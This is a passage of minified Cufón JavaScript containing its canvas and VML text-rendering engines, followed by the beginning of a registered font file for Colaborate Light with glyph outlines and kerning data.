g=m[j];k[g.m].apply(k,g.a)}}return function(V,w,P,t,C,W){var k=(w===null);if(k){w=C.getAttribute("alt")}var A=V.viewBox;var m=P.getSize("fontSize",V.baseSize);var B=0,O=0,N=0,u=0;var z=t.textShadow,L=[];if(z){for(var U=z.length;U--;){var F=z[U];var K=m.convertFrom(parseFloat(F.offX));var I=m.convertFrom(parseFloat(F.offY));L[U]=[K,I];if(I<B){B=I}if(K>O){O=K}if(I>N){N=I}if(K<u){u=K}}}var Z=Cufon.CSS.textTransform(w,P).split("");var E=V.spacing(Z,~~m.convertFrom(parseFloat(P.get("letterSpacing"))||0),~~m.convertFrom(parseFloat(P.get("wordSpacing"))||0));if(!E.length){return null}var h=E.total;O+=A.width-E[E.length-1];u+=A.minX;var s,n;if(k){s=C;n=C.firstChild}else{s=document.createElement("cufon");s.className="cufon cufon-canvas";s.setAttribute("alt",w);n=document.createElement("canvas");s.appendChild(n);if(t.printable){var S=document.createElement("cufontext");S.appendChild(document.createTextNode(w));s.appendChild(S)}}var aa=s.style;var H=n.style;var j=m.convert(A.height);var Y=Math.ceil(j);var M=Y/j;var G=M*Cufon.CSS.fontStretch(P.get("fontStretch"));var J=h*G;var Q=Math.ceil(m.convert(J+O-u));var o=Math.ceil(m.convert(A.height-B+N));n.width=Q;n.height=o;H.width=Q+"px";H.height=o+"px";B+=A.minY;H.top=Math.round(m.convert(B-V.ascent))+"px";H.left=Math.round(m.convert(u))+"px";var r=Math.max(Math.ceil(m.convert(J)),0)+"px";if(a){aa.width=r;aa.height=m.convert(V.height)+"px"}else{aa.paddingLeft=r;aa.paddingBottom=(m.convert(V.height)-1)+"px"}var X=n.getContext("2d"),D=j/A.height;X.scale(D,D*M);X.translate(-u,-B);X.save();function T(){var x=V.glyphs,ab,l=-1,g=-1,y;X.scale(G,1);while(y=Z[++l]){var ab=x[Z[l]]||V.missingGlyph;if(!ab){continue}if(ab.d){X.beginPath();if(ab.code){c(ab.code,X)}else{ab.code=d("m"+ab.d,X)}X.fill()}X.translate(E[++g],0)}X.restore()}if(z){for(var U=z.length;U--;){var F=z[U];X.save();X.fillStyle=F.color;X.translate.apply(X,L[U]);T()}}var q=t.textGradient;if(q){var v=q.stops,p=X.createLinearGradient(0,A.minY,0,A.maxY);for(var U=0,R=v.length;U<R;++U){p.addColorStop.apply(p,v[U])}X.fillStyle=p}else{X.fillStyle=P.get("color")}T();return s}})());Cufon.registerEngine("vml",(function(){var e=document.namespaces;if(!e){return}e.add("cvml","urn:schemas-microsoft-com:vml");e=null;var b=document.createElement("cvml:shape");b.style.behavior="url(#default#VML)";if(!b.coordsize){return}b=null;var h=(document.documentMode||0)<8;document.write(('<style type="text/css">cufoncanvas{text-indent:0;}@media screen{cvml\\:shape,cvml\\:rect,cvml\\:fill,cvml\\:shadow{behavior:url(#default#VML);display:block;antialias:true;position:absolute;}cufoncanvas{position:absolute;text-align:left;}cufon{display:inline-block;position:relative;vertical-align:'+(h?"middle":"text-bottom")+";}cufon cufontext{position:absolute;left:-10000in;font-size:1px;}a cufon{cursor:pointer}}@media print{cufon cufoncanvas{display:none;}}</style>").replace(/;/g,"!important;"));function c(i,j){return a(i,/(?:em|ex|%)$|^[a-z-]+$/i.test(j)?"1em":j)}function a(l,m){if(m==="0"){return 0}if(/px$/i.test(m)){return parseFloat(m)}var k=l.style.left,j=l.runtimeStyle.left;l.runtimeStyle.left=l.currentStyle.left;l.style.left=m.replace("%","em");var i=l.style.pixelLeft;l.style.left=k;l.runtimeStyle.left=j;return i}function f(l,k,j,n){var i="computed"+n,m=k[i];if(isNaN(m)){m=k.get(n);k[i]=m=(m=="normal")?0:~~j.convertFrom(a(l,m))}return m}var g={};function d(p){var q=p.id;if(!g[q]){var n=p.stops,o=document.createElement("cvml:fill"),i=[];o.type="gradient";o.angle=180;o.focus="0";o.method="sigma";o.color=n[0][1];for(var m=1,l=n.length-1;m<l;++m){i.push(n[m][0]*100+"% "+n[m][1])}o.colors=i.join(",");o.color2=n[l][1];g[q]=o}return g[q]}return function(ac,G,Y,C,K,ad,W){var n=(G===null);if(n){G=K.alt}var I=ac.viewBox;var p=Y.computedFontSize||(Y.computedFontSize=new Cufon.CSS.Size(c(ad,Y.get("fontSize"))+"px",ac.baseSize));var y,q;if(n){y=K;q=K.firstChild}else{y=document.createElement("cufon");y.className="cufon cufon-vml";y.alt=G;q=document.createElement("cufoncanvas");y.appendChild(q);if(C.printable){var Z=document.createElement("cufontext");Z.appendChild(document.createTextNode(G));y.appendChild(Z)}if(!W){y.appendChild(document.createElement("cvml:shape"))}}var ai=y.style;var R=q.style;var l=p.convert(I.height),af=Math.ceil(l);var V=af/l;var P=V*Cufon.CSS.fontStretch(Y.get("fontStretch"));var U=I.minX,T=I.minY;R.height=af;R.top=Math.round(p.convert(T-ac.ascent));R.left=Math.round(p.convert(U));ai.height=p.convert(ac.height)+"px";var F=Y.get("color");var ag=Cufon.CSS.textTransform(G,Y).split("");var L=ac.spacing(ag,f(ad,Y,p,"letterSpacing"),f(ad,Y,p,"wordSpacing"));if(!L.length){return null}var k=L.total;var x=-U+k+(I.width-L[L.length-1]);var ah=p.convert(x*P),X=Math.round(ah);var O=x+","+I.height,m;var J="r"+O+"ns";var u=C.textGradient&&d(C.textGradient);var o=ac.glyphs,S=0;var H=C.textShadow;var ab=-1,aa=0,w;while(w=ag[++ab]){var D=o[ag[ab]]||ac.missingGlyph,v;if(!D){continue}if(n){v=q.childNodes[aa];while(v.firstChild){v.removeChild(v.firstChild)}}else{v=document.createElement("cvml:shape");q.appendChild(v)}v.stroked="f";v.coordsize=O;v.coordorigin=m=(U-S)+","+T;v.path=(D.d?"m"+D.d+"xe":"")+"m"+m+J;v.fillcolor=F;if(u){v.appendChild(u.cloneNode(false))}var ae=v.style;ae.width=X;ae.height=af;if(H){var s=H[0],r=H[1];var B=Cufon.CSS.color(s.color),z;var N=document.createElement("cvml:shadow");N.on="t";N.color=B.color;N.offset=s.offX+","+s.offY;if(r){z=Cufon.CSS.color(r.color);N.type="double";N.color2=z.color;N.offset2=r.offX+","+r.offY}N.opacity=B.opacity||(z&&z.opacity)||1;v.appendChild(N)}S+=L[aa++]}var M=v.nextSibling,t,A;if(C.forceHitArea){if(!M){M=document.createElement("cvml:rect");M.stroked="f";M.className="cufon-vml-cover";t=document.createElement("cvml:fill");t.opacity=0;M.appendChild(t);q.appendChild(M)}A=M.style;A.width=X;A.height=af}else{if(M){q.removeChild(M)}}ai.width=Math.max(Math.ceil(p.convert(k*P)),0);if(h){var Q=Y.computedYAdjust;if(Q===undefined){var E=Y.get("lineHeight");if(E=="normal"){E="1em"}else{if(!isNaN(E)){E+="em"}}Y.computedYAdjust=Q=0.5*(a(ad,E)-parseFloat(ai.height))}if(Q){ai.marginTop=Math.ceil(Q)+"px";ai.marginBottom=Q+"px"}}return y}})());
/*!
 * The following copyright notice may not be removed under any circumstances.
 * 
 * Copyright:
 * Copyright (c) 2003 by This Font is designed by Ralph Oliver du Carrois. All
 * rights reserved.
 * 
 * Trademark:
 * Colaborate Light is a trademark of This Font is designed by Ralph Oliver du
 * Carrois.
 * 
 * Description:
 * Copyright (c) 2003 by This Font is designed by Ralph Oliver du Carrois. All
 * rights reserved.
 * 
 * Manufacturer:
 * This Font is designed by Ralph Oliver du Carrois
 */
Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"162,-83v0,48,-17,87,-72,87v-55,0,-73,-39,-73,-87v0,-45,18,-85,73,-85v55,0,72,37,72,85xm138,-83v0,-40,-11,-67,-48,-67v-35,0,-49,27,-49,67v0,39,12,69,49,69v37,0,48,-29,48,-69xm127,-199r-23,0r0,-27r23,0r0,27xm73,-199r-23,0r0,-27r23,0r0,27","w":178},{"d":"58,0r-26,0r0,-233r26,0r0,233xm72,-249r-19,0r-42,-42r21,0","w":88},{"d":"158,-69v0,71,-76,86,-139,66r9,-22v44,19,103,13,103,-44v0,-58,-55,-59,-86,-36r-20,-8r0,-106r124,0r0,21r-98,0r0,66v49,-21,107,1,107,63"},{"d":"108,-73v0,76,-54,87,-94,96r-8,-23v32,-6,76,-9,76,-70r0,-163r26,0r0,160","w":143},{"d":"174,68r-22,0r0,-281v-42,-2,-76,-2,-76,42v0,22,20,36,36,40r0,199r-23,0r0,-180v-46,-4,-60,-34,-60,-60v0,-25,9,-61,66,-61r79,0r0,301","w":194},{"d":"151,0r-24,0r0,-102v0,-25,-4,-48,-36,-48v-22,0,-36,20,-42,35r0,115r-24,0r0,-130v0,-14,-2,-22,-3,-35r20,0r6,25v6,-8,20,-28,46,-28v82,-2,51,97,57,168xm138,-218v-5,13,-15,24,-31,24v-18,-5,-44,-27,-51,1r-16,-6v11,-36,45,-23,67,-11v9,0,13,-9,15,-15","w":176},{"d":"155,-165v-7,72,-1,153,-3,230r-24,0r0,-84v-9,12,-24,23,-45,23v-47,0,-66,-39,-66,-85v0,-47,19,-87,67,-87v21,0,37,15,45,28r6,-25r20,0xm129,-39r0,-76v-22,-59,-88,-38,-88,33v0,79,66,81,88,43","w":176},{"d":"222,-116v0,69,-25,122,-99,122v-77,0,-100,-53,-100,-122v0,-69,25,-121,100,-121v76,0,99,51,99,121xm195,-116v0,-62,-17,-100,-72,-100v-55,0,-73,38,-73,100v0,62,18,102,73,102v56,0,72,-42,72,-102","w":244,"k":{"Z":4,"Y":9,"X":9,"W":9,"V":9,"J":7,"A":4}},{"d":"110,-191r-19,0r-42,-42r27,0xm152,0r-21,0r-5,-24v-6,8,-19,28,-45,28v-80,1,-51,-98,-56,-169r24,0r0,103v0,25,4,48,35,48v22,0,35,-20,41,-35r0,-116r23,0v1,55,-4,117,4,165","w":173},{"d":"153,0r-21,0r-5,-24v-3,17,-56,42,-77,17r0,72r-24,0r0,-230r24,0r0,103v0,25,4,48,35,48v22,0,35,-24,41,-39r0,-112r23,0v1,55,-4,117,4,165"},{"d":"162,-83v0,48,-17,87,-72,87v-55,0,-73,-39,-73,-87v0,-45,18,-85,73,-85v55,0,72,37,72,85xm138,-83v0,-40,-11,-67,-48,-67v-35,0,-49,27,-49,67v0,39,12,69,49,69v37,0,48,-29,48,-69xm124,-233r-42,42r-19,0r35,-42r26,0","w":178},{"d":"180,37r-180,0r0,-19r180,0r0,19","w":180},{"d":"150,0r-21,0v0,-3,-6,-15,-6,-19v-20,35,-110,30,-106,-24v-5,-37,35,-61,104,-57v1,-29,-3,-50,-33,-50v-23,0,-41,6,-56,14r-8,-20v43,-17,121,-24,121,40v0,44,-2,75,5,116xm121,-36r0,-46v-50,-2,-84,8,-79,38v-3,38,68,37,79,8","w":172},{"d":"132,-190v0,26,-11,48,-44,48v-33,0,-44,-22,-44,-48v0,-25,11,-47,44,-47v33,0,44,21,44,47xm116,-190v0,-22,-7,-35,-28,-35v-19,0,-28,13,-28,35v0,22,7,36,28,36v20,0,28,-14,28,-36"},{"d":"243,-165r-57,165r-23,0r-35,-116r-38,116r-24,0r-52,-165r25,0r41,135r38,-119r22,0r36,118r43,-134r24,0","w":256,"k":{"\u00c1":9,"\u00c2":9,"\u0153":4,"\u00c3":9,"\u00c0":9,"\u00bf":3,"\u00f8":4,"\u00e6":4,"\u00c6":9,"\u00a2":4,"\u00f5":4,"\u00f6":4,"\u00f4":4,"\u00f2":4,"\u00f3":4,"\u00eb":4,"\u00ea":4,"\u00e8":4,"\u00e9":4,"\u00e7":4,"\u00e5":4,"\u00e3":4,"\u00e4":4,"\u00e2":4,"\u00e0":4,"\u00e1":4,"\u00c5":9,"\u00c4":9,"s":4,"q":4,"o":4,"g":4,"e":4,"d":4,"c":4,"a":4,"Y":9,"T":9,"J":9,"A":9,".":31,",":31,"\u0161":4}},{"d":"146,0r-20,0r-6,-24v-6,8,-19,28,-45,28v-80,1,-51,-98,-56,-169r24,0r0,103v0,25,4,48,35,48v22,0,35,-20,41,-35r0,-116r24,0r0,130v0,14,2,22,3,35xm115,-233r-42,42r-19,0r35,-42r26,0","w":173},{"d":"198,0r-27,0r0,-110r-109,0r0,110r-27,0r0,-233r27,0r0,102r109,0r0,-102r27,0r0,233","w":232},{"w":87},{"d":"168,0r-133,0r0,-99r-25,17r-12,-19r37,-25r0,-107r27,0r0,89r36,-24r12,19r-48,32r0,95r106,0r0,22","w":171},{"d":"49,0r-23,0r0,-165r23,0r0,165","w":74},{"d":"49,0r-24,0r0,-237r24,0r0,237","w":73},{"d":"152,0r-21,0r-5,-24v-6,8,-19,28,-45,28v-80,1,-51,-98,-56,-169r24,0r0,103v0,25,4,48,35,48v22,0,35,-20,41,-35r0,-116r23,0v1,55,-4,117,4,165xm129,-193r-19,0r-23,-26v-12,10,-15,30,-42,26r32,-40r21,0","w":173},{"d":"209,-85v0,62,-27,91,-84,91v-63,0,-90,-30,-90,-92r0,-147r27,0r0,143v0,59,20,76,63,76v86,0,51,-139,58,-219r26,0r0,148","w":244},{"d":"156,-74r-114,0v-5,61,56,73,99,46r7,19v-19,9,-40,13,-61,13v-50,0,-70,-39,-70,-85v0,-38,15,-87,69,-87v54,0,70,38,70,94xm132,-93v-1,-39,-15,-57,-46,-57v-26,0,-42,19,-44,57r90,0xm127,-199r-23,0r0,-27r23,0r0,27xm73,-199r-23,0r0,-27r23,0r0,27","w":173},{"d":"163,-97r-150,0r0,-21r150,0r0,21xm163,-35r-150,0r0,-21r150,0r0,21"},{"d":"156,-74r-114,0v-5,61,56,73,99,46r7,19v-19,9,-40,13,-61,13v-50,0,-70,-39,-70,-85v0,-38,15,-87,69,-87v54,0,70,38,70,94xm132,-93v-1,-39,-15,-57,-46,-57v-26,0,-42,19,-44,57r90,0xm128,-193r-19,0r-23,-26v-12,10,-15,30,-42,26r32,-40r21,0","w":173},{"d":"181,-4v-19,6,-36,10,-56,10r0,5v18,0,26,12,26,23v2,33,-39,36,-70,29r6,-19v20,2,38,9,42,-9v0,-8,-3,-12,-29,-12r5,-18v-60,-6,-82,-55,-82,-121v0,-65,23,-121,99,-121v20,0,39,3,57,9r-9,23v-15,-6,-31,-11,-48,-11v-57,0,-72,45,-72,99v0,57,16,103,70,103v18,0,33,-5,52,-13","w":195},{"d":"207,0r-38,0r-110,-202r0,202r-24,0r0,-233r38,0r109,202r0,-202r25,0r0,233xm166,-271v-5,13,-15,24,-31,24v-18,-5,-44,-27,-51,1r-16,-7v11,-36,45,-21,67,-11v9,0,13,-8,15,-14","w":242},{"d":"180,-118v0,66,-52,73,-118,69r0,49r-27,0r0,-233r27,0r0,49v65,-3,118,1,118,66xm153,-118v0,-53,-44,-44,-91,-45r0,93v48,0,91,7,91,-48","w":199},{"d":"216,0r-30,0r-24,-69r-96,0r-26,69r-28,0r95,-233r21,0xm155,-89r-39,-111r-43,111r82,0xm156,-248r-24,0r0,-26r24,0r0,26xm101,-248r-23,0r0,-26r23,0r0,26","w":227,"k":{"\u00d2":4,"\u00d3":4,"\u0178":31,"\u00ff":19,"\u0153":4,"\u0152":4,"\u00d5":4,"\u00e6":4,"\u00a2":4,"\u00fc":4,"\u00fb":4,"\u00f9":4,"\u00fa":4,"\u00f5":4,"\u00f6":4,"\u00f4":4,"\u00f2":4,"\u00f3":4,"\u00eb":4,"\u00ea":4,"\u00e9":4,"\u00e7":4,"\u00e5":4,"\u00e3":4,"\u00e4":4,"\u00e2":4,"\u00e0":4,"\u00e1":4,"\u00d6":4,"\u00c7":4,"y":19,"w":19,"v":19,"u":4,"q":4,"o":4,"e":4,"d":4,"c":4,"a":4,"Y":31,"W":31,"V":31,"T":19,"Q":4,"O":3,"G":4,"C":4,"\u00dd":19}},{"d":"152,0r-21,0r-5,-24v-6,8,-19,28,-45,28v-80,1,-51,-98,-56,-169r24,0r0,103v0,25,4,48,35,48v22,0,35,-20,41,-35r0,-116r23,0v1,55,-4,117,4,165","w":173},{"d":"252,0r-23,0v-8,-56,26,-150,-36,-150v-21,0,-38,20,-44,37r0,113r-23,0v-5,-54,20,-149,-36,-150v-20,0,-36,20,-41,34r0,116r-24,0r0,-127v0,-14,-2,-26,-3,-38r20,0r6,25v7,-10,24,-28,46,-28v30,0,41,13,50,32v9,-15,27,-32,51,-32v77,0,54,98,57,168","w":277},{"d":"58,-203r-28,0r0,-30r28,0r0,30xm56,0r-24,0r0,-172r24,0r0,172","w":87},{"d":"111,-86v-56,4,7,125,-92,128r0,-19v71,0,20,-100,70,-118v-49,-22,2,-118,-70,-118r0,-20v100,3,37,126,92,128r0,19","w":128},{"d":"139,-7v-10,5,-28,9,-41,10r0,33r-20,0r0,-33v-42,-5,-61,-38,-61,-84v0,-49,18,-82,61,-87r0,-33r20,0r0,33v14,1,30,6,40,10r-8,20v-10,-5,-22,-9,-32,-11r0,134v10,-1,21,-6,32,-12xm78,-16r0,-133v-50,6,-51,127,0,133","w":152},{"d":"161,-165r-69,191v-9,26,-20,39,-50,49r-8,-20v38,-8,33,-35,46,-62r-66,-158r26,0r52,131r45,-131r24,0","w":174,"k":{"\u00c1":9,"\u00c2":9,"\u0153":4,"\u00c3":9,"\u00c0":9,"\u00f8":4,"\u00e6":4,"\u00c6":9,"\u00a2":4,"\u00f5":4,"\u00f6":4,"\u00f4":4,"\u00f2":4,"\u00f3":4,"\u00eb":4,"\u00ea":4,"\u00e8":4,"\u00e9":4,"\u00e7":4,"\u00e5":4,"\u00e3":4,"\u00e4":4,"\u00e2":4,"\u00e0":4,"\u00e1":4,"\u00c5":9,"\u00c4":9,"s":4,"q":4,"o":4,"g":4,"e":4,"d":4,"c":4,"a":4,"T":9,"J":9,"A":9,".":19,",":19,"\u0161":4}},{"d":"250,-117v0,68,-53,121,-120,121v-67,0,-121,-53,-121,-121v0,-68,54,-120,121,-120v68,0,120,52,120,120xm233,-117v0,-58,-45,-104,-103,-104v-58,0,-103,46,-103,104v0,57,46,105,103,105v57,0,103,-48,103,-105xm167,-49v-54,22,-106,-8,-100,-67v-7,-53,43,-86,98,-67r-6,16v-40,-20,-81,6,-74,51v-5,50,36,72,76,51","w":259},{"d":"181,-4v-21,7,-38,10,-61,10v-71,0,-97,-51,-97,-122v0,-65,23,-121,99,-121v20,0,39,3,57,9r-9,23v-15,-6,-31,-11,-48,-11v-57,0,-72,45,-72,99v0,57,16,103,70,103v18,0,33,-5,52,-13","w":195},{"d":"160,-83v0,47,-21,87,-70,87v-20,0,-34,-11,-42,-23r-6,19r-20,0v7,-75,1,-158,3,-237r24,0r0,97v8,-13,25,-28,47,-28v46,0,64,39,64,85xm135,-82v0,-49,-19,-68,-43,-68v-27,0,-39,24,-44,35r0,75v27,48,87,28,87,-42","w":176},{"d":"162,-83v0,48,-17,87,-72,87v-55,0,-73,-39,-73,-87v0,-45,18,-85,73,-85v55,0,72,37,72,85xm138,-83v0,-40,-11,-67,-48,-67v-35,0,-49,27,-49,67v0,39,12,69,49,69v37,0,48,-29,48,-69xm135,-218v-5,13,-15,24,-31,24v-18,-4,-45,-27,-51,1r-16,-6v10,-37,44,-22,66,-11v9,0,14,-9,16,-15","w":178},{"d":"71,34v2,33,-39,36,-70,29r7,-18v20,1,37,7,41,-10v0,-8,-2,-12,-28,-12r7,-28r20,0r-3,16v18,0,26,12,26,23","w":74},{"d":"150,0r-21,0v0,-3,-6,-15,-6,-19v-20,35,-110,30,-106,-24v-5,-37,35,-61,104,-57v1,-29,-3,-50,-33,-50v-23,0,-41,6,-56,14r-8,-20v43,-17,121,-24,121,40v0,44,-2,75,5,116xm121,-36r0,-46v-50,-2,-84,8,-79,38v-3,38,68,37,79,8xm130,-218v-5,13,-15,24,-31,24v-18,-4,-45,-27,-51,1r-16,-6v11,-36,44,-23,66,-11v9,0,14,-9,16,-15","w":172},{"d":"153,0r-28,0r-44,-67r-46,67r-26,0r59,-83r-55,-82r28,0r41,63r43,-63r25,0r-56,79","w":162},{"d":"167,0r-132,0r0,-233r129,0r0,21r-102,0r0,81r95,0r0,21r-95,0r0,89r105,0r0,21xm126,-247r-19,0r-43,-42r27,0","w":192},{"d":"54,60r-21,0r0,-313r21,0r0,313","w":87},{"d":"117,0r-26,0r0,-190r-42,36r-9,-21r52,-44r25,0r0,219"},{"d":"162,-83v0,48,-17,87,-72,87v-55,0,-73,-39,-73,-87v0,-45,18,-85,73,-85v55,0,72,37,72,85xm138,-83v0,-40,-11,-67,-48,-67v-35,0,-49,27,-49,67v0,39,12,69,49,69v37,0,48,-29,48,-69xm113,-191r-18,0r-43,-42r27,0","w":178},{"d":"222,-116v0,69,-25,122,-99,122v-77,0,-100,-53,-100,-122v0,-69,25,-121,100,-121v76,0,99,51,99,121xm195,-116v0,-62,-17,-100,-72,-100v-55,0,-73,38,-73,100v0,62,18,102,73,102v56,0,72,-42,72,-102xm162,-248r-24,0r0,-26r24,0r0,26xm107,-248r-23,0r0,-26r23,0r0,26","w":244},{"d":"150,0r-21,0v0,-3,-6,-15,-6,-19v-20,35,-110,30,-106,-24v-5,-37,35,-61,104,-57v1,-29,-3,-50,-33,-50v-23,0,-41,6,-56,14r-8,-20v43,-17,121,-24,121,40v0,44,-2,75,5,116xm121,-36r0,-46v-50,-2,-84,8,-79,38v-3,38,68,37,79,8xm123,-193r-19,0r-23,-26v-12,10,-15,30,-42,26r32,-40r21,0","w":172},{"d":"167,0r-132,0r0,-233r129,0r0,21r-102,0r0,81r95,0r0,21r-95,0r0,89r105,0r0,21","w":192},{"d":"103,-203r-28,0r0,-30r28,0r0,30xm137,-7v-46,16,-118,23,-119,-45v0,-43,59,-51,59,-89r0,-33r24,0r0,35v0,49,-57,53,-57,87v0,47,57,38,86,22","w":147},{"d":"66,-191r-18,0r-43,-42r27,0xm49,0r-23,0r0,-165r23,0r0,165","w":74},{"d":"150,0r-21,0v0,-3,-6,-15,-6,-19v-20,35,-110,30,-106,-24v-5,-37,35,-61,104,-57v1,-29,-3,-50,-33,-50v-23,0,-41,6,-56,14r-8,-20v43,-17,121,-24,121,40v0,44,-2,75,5,116xm121,-36r0,-46v-50,-2,-84,8,-79,38v-3,38,68,37,79,8xm100,-191r-19,0r-42,-42r27,0","w":172},{"d":"166,-92v0,24,-20,38,-43,38v-29,0,-51,-28,-69,-28v-16,0,-24,7,-24,25r-21,-10v0,-24,18,-37,42,-37v28,0,51,27,70,27v16,0,25,-8,25,-25"},{"d":"216,0r-30,0r-24,-69r-96,0r-26,69r-28,0r95,-233r21,0xm155,-89r-39,-111r-43,111r82,0xm149,-246r-18,0r-43,-42r28,0","w":227},{"d":"145,-60v0,-65,-124,-38,-121,-116v3,-64,82,-70,140,-52r-9,24v-29,-19,-104,-18,-104,28v0,23,22,32,46,41v35,12,75,25,75,75v0,77,-88,73,-148,56r9,-23v40,17,112,26,112,-33","w":197},{"d":"207,0r-38,0r-110,-202r0,202r-24,0r0,-233r38,0r109,202r0,-202r25,0r0,233","w":242},{"d":"68,-233r-42,42r-19,0r34,-42r27,0","w":74},{"d":"103,-114r-81,0r-5,-13v20,-17,67,-50,67,-74v0,-32,-39,-25,-59,-14r-5,-14v35,-15,82,-12,82,28v0,28,-42,56,-63,73r64,0r0,14","w":119},{"d":"56,-233r-3,78r-18,0r-3,-78r24,0","w":87},{"d":"160,-50v0,58,-45,71,-87,71r7,-21v31,0,57,-12,57,-50v0,-41,-44,-59,-64,-65r0,-19v11,-7,41,-25,41,-52v0,-24,-18,-32,-33,-32v-23,0,-32,9,-32,44r0,174r-24,0r0,-170v0,-45,16,-67,56,-67v30,0,57,16,57,52v0,33,-35,53,-44,59v19,8,66,23,66,76","w":177},{"d":"138,-181v0,60,-97,49,-97,118v0,22,13,50,49,50v17,0,32,-13,41,-28r0,-44r-37,0r0,-18r61,0v0,33,0,79,4,103r-21,0r-5,-19v-30,45,-116,24,-116,-43v0,-27,10,-53,42,-68v-12,-9,-35,-21,-35,-48v0,-33,15,-60,57,-60v36,0,57,18,57,57xm77,-139v36,-4,59,-79,3,-81v-24,0,-32,17,-32,41v0,20,19,32,29,40"},{"d":"197,-233r-81,128r0,105r-27,0r0,-103r-83,-130r30,0r68,105r65,-105r28,0xm135,-291r-42,42r-19,0r35,-42r26,0","w":202,"k":{"\u00d2":9,"\u00d3":9,"\u00c1":19,"\u00c2":19,"\u0153":9,"\u0152":9,"\u00d5":9,"\u00c3":19,"\u00c0":19,"\u00f8":9,"\u00e6":9,"\u00d8":9,"\u00c6":19,"\u00a2":9,"\u00f5":9,"\u00f6":9,"\u00f4":9,"\u00f2":9,"\u00f3":9,"\u00eb":9,"\u00ea":9,"\u00e8":9,"\u00e9":9,"\u00e7":9,"\u00e5":9,"\u00e3":9,"\u00e4":9,"\u00e2":9,"\u00e0":9,"\u00e1":9,"\u00d6":9,"\u00c7":9,"\u00c5":19,"\u00c4":19,"s":9,"q":9,"o":9,"g":9,"e":9,"d":9,"c":9,"a":9,"Q":9,"O":9,"J":19,"G":9,"C":9,"A":19,".":19,",":19}},{"d":"58,0r-27,0r0,-233r27,0r0,233xm83,-253r-23,0r0,-26r23,0r0,26xm29,-253r-24,0r0,-26r24,0r0,26","w":88},{"d":"192,-14v-24,12,-42,20,-71,20v-78,0,-98,-60,-98,-123v0,-94,65,-141,154,-111r-9,23v-63,-28,-118,-1,-118,88v0,56,14,103,72,103v17,0,32,-7,46,-15r0,-65r-51,0r0,-21r75,0r0,101","w":214},{"d":"57,0r-26,0r0,-233r26,0r0,233xm86,-251r-19,0r-22,-25v-12,10,-16,29,-43,25r32,-40r21,0","w":88},{"d":"150,0r-21,0v0,-3,-6,-15,-6,-19v-20,35,-110,30,-106,-24v-5,-37,35,-61,104,-57v1,-29,-3,-50,-33,-50v-23,0,-41,6,-56,14r-8,-20v43,-17,121,-24,121,40v0,44,-2,75,5,116xm121,-36r0,-46v-50,-2,-84,8,-79,38v-3,38,68,37,79,8xm116,-212v0,17,-13,29,-30,29v-16,0,-29,-13,-29,-29v0,-17,12,-30,29,-30v17,0,30,13,30,30xm104,-212v0,-10,-7,-18,-18,-18v-22,0,-23,35,0,35v12,0,18,-8,18,-17","w":172},{"d":"216,0r-30,0r-24,-69r-96,0r-26,69r-28,0r95,-233r21,0xm155,-89r-39,-111r-43,111r82,0xm151,-271v0,17,-13,29,-30,29v-16,0,-30,-13,-30,-29v0,-17,13,-30,30,-30v17,0,30,13,30,30xm138,-271v0,-10,-6,-18,-17,-18v-22,0,-24,35,0,35v12,0,17,-8,17,-17","w":227},{"d":"123,-237v112,0,135,171,41,204r0,14r52,0r0,19r-75,0r0,-46v40,-6,53,-40,53,-84v0,-61,-29,-86,-71,-86v-40,0,-72,21,-72,86v0,45,14,79,54,84r0,46r-75,0r0,-19r52,0r0,-14v-41,-13,-58,-56,-58,-96v0,-68,36,-108,99,-108","w":246},{"d":"167,0r-132,0r0,-233r129,0r0,21r-102,0r0,81r95,0r0,21r-95,0r0,89r105,0r0,21xm136,-286r-43,42r-18,0r34,-42r27,0","w":192},{"d":"222,-116v0,69,-25,122,-99,122v-77,0,-100,-53,-100,-122v0,-69,25,-121,100,-121v76,0,99,51,99,121xm195,-116v0,-62,-17,-100,-72,-100v-55,0,-73,38,-73,100v0,62,18,102,73,102v56,0,72,-42,72,-102xm172,-271v-5,13,-15,24,-31,24v-18,-4,-45,-27,-51,1r-16,-7v11,-35,44,-22,66,-11v9,0,14,-8,16,-14","w":244},{"d":"160,-83v0,47,-21,87,-70,87v-20,0,-34,-11,-42,-23r-6,84r-20,0r3,-302r24,0r0,97v8,-13,25,-28,47,-28v46,0,64,39,64,85xm135,-82v0,-49,-19,-68,-43,-68v-27,0,-39,24,-44,35r0,75v27,48,87,28,87,-42","w":176},{"d":"239,0r-220,0r101,-233r18,0xm207,-20r-77,-184r-78,184r155,0","w":258},{"d":"100,-221v-38,3,-49,19,-46,56r37,0r0,19r-37,0r0,146r-24,0r0,-146r-25,0r0,-19r25,0v-7,-49,30,-74,64,-76","w":100},{"d":"91,-137r-34,23r0,114r-26,0r0,-97r-22,15r-12,-19r34,-23r0,-109r26,0r0,92r22,-15","w":88},{"d":"173,-233r-67,121r49,0r0,20r-53,0r0,26r53,0r0,20r-53,0r0,46r-26,0r0,-46r-52,0r0,-20r52,0r0,-26r-52,0r0,-20r47,0r-69,-121r30,0r58,104r56,-104r27,0"},{"d":"134,-145r-94,127r90,0r0,18r-108,0r-9,-20r95,-126r-86,0r0,-19r104,0xm116,-233r-32,40r-21,0r-31,-40r19,0r23,26v12,-10,15,-30,42,-26","w":147},{"d":"209,-85v0,62,-27,91,-84,91v-63,0,-90,-30,-90,-92r0,-147r27,0r0,143v0,59,20,76,63,76v86,0,51,-139,58,-219r26,0r0,148xm158,-287r-42,43r-19,0r35,-43r26,0","w":244},{"d":"119,-97r-33,64r-23,0r35,-65r-35,-65r23,0xm68,-97r-34,64r-22,0r34,-65r-35,-65r23,0","w":131},{"d":"159,-116v0,75,-47,144,-132,115r9,-22v58,27,101,-17,99,-88v-26,62,-119,37,-119,-38v0,-40,28,-74,69,-74v63,0,74,54,74,107xm131,-130v0,-56,-16,-73,-46,-73v-25,0,-42,20,-42,54v0,29,8,55,41,55v29,0,42,-23,47,-36"},{"d":"222,-116v0,69,-25,122,-99,122v-77,0,-100,-53,-100,-122v0,-69,25,-121,100,-121v76,0,99,51,99,121xm195,-116v0,-62,-17,-100,-72,-100v-55,0,-73,38,-73,100v0,62,18,102,73,102v56,0,72,-42,72,-102xm143,-247r-18,0r-43,-42r27,0","w":244},{"d":"176,-157r-23,25v20,57,11,139,-63,136v-21,0,-37,-6,-48,-16r-20,22r-17,-16r22,-24v-22,-56,-12,-140,63,-138v22,0,38,6,49,17r20,-22xm124,-135v-32,-34,-83,-6,-83,52v0,12,2,23,5,33xm90,-14v47,2,53,-53,45,-98r-78,84v7,8,18,14,33,14","w":178},{"d":"166,-39r-22,0r0,-64r-137,0r0,-20r159,0r0,84"},{"d":"222